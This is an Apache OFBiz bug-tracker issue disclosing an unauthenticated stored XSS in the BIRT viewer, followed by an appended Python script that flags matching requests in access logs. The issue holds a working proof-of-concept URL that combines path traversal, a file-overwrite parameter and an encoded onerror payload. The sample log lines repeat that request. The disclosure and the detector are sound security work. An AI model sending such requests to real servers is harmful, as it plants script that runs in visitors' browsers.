Nikita Podotykin created OFBIZ-12578:
----------------------------------------
Summary: Unauth Stored XSS
Key: OFBIZ-12578
URL: https://issues.apache.org/jira/browse/OFBIZ-12578
Project: OFBiz
Issue Type: Bug
Affects Versions: 18.12.05
Reporter: Nikita Podotykin
Fix For: 18.12.05
Attachments: image-2022-02-21-16-04-20-703.png,
image-2022-02-21-16-04-53-035.png
*Description of the vulnerability*
*Unauth Stored XSS*
So, let's try to create an HTML file in the current folder — index.html. An attacker could inject a malicious payload and execute it using Stored XSS.
https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=html&__overwrite=true&__document=index.html&reportBy=%3c%69%6d%67%20%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%29%3e
!image-2022-02-21-16-04-20-703.png!
When accessed along the path /birt/index.html, the injected malicious load will
be executed.
!image-2022-02-21-16-04-53-035.png!
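A log-review check for the request pattern described in the report above, as an added example that is not part of the original issue or of OFBiz itself. It assumes combined-format access logs; the function names, the markup heuristic and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic (assumption): angle brackets or an inline event-handler attribute
MARKUP_RE = re.compile(r"[<>]|\bon\w+\s*=", re.IGNORECASE)

def review_birt_request(target):
    """Return the reasons a request target under /birt/ deserves review."""
    parts = urlsplit(target)
    if not parts.path.startswith("/birt/"):
        return []
    # parse_qsl percent-decodes values, so encoded markup is inspected in clear
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    reasons = []
    if "__document" in params:
        reasons.append("writes server-side document: " + params["__document"])
    if params.get("__overwrite", "").lower() == "true":
        reasons.append("overwrite requested")
    if ".." in params.get("__report", ""):
        reasons.append("relative traversal in __report")
    for name, value in params.items():
        # Parameters without the "__" prefix are report inputs such as reportBy
        if not name.startswith("__") and MARKUP_RE.search(value):
            reasons.append("HTML markup in report parameter: " + name)
    return reasons

def scan(log_lines):
    """Map 1-based line number -> reasons for every flagged access-log line."""
    findings = {}
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        reasons = review_birt_request(match.group(1)) if match else []
        if reasons:
            findings[number] = reasons
    return findings

# Constructed sample log lines (not taken from a real system)
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Feb/2022:16:01:00 +0000] "GET /birt/output?__report=./../ordermgr/reports/SalesReport.rptdesign&__format=html&__overwrite=true&__document=index.html&reportBy=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5120',
    '10.0.0.7 - - [21/Feb/2022:16:02:00 +0000] "GET /ordermgr/control/main HTTP/1.1" 200 2048',
    '10.0.0.8 - - [21/Feb/2022:16:03:00 +0000] "GET /birt/index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG).items():
        print(number, reasons)
```

A flagged line shows that an unauthenticated request asked the viewer to persist output; the stored file named in `__document` is what should then be inspected and removed.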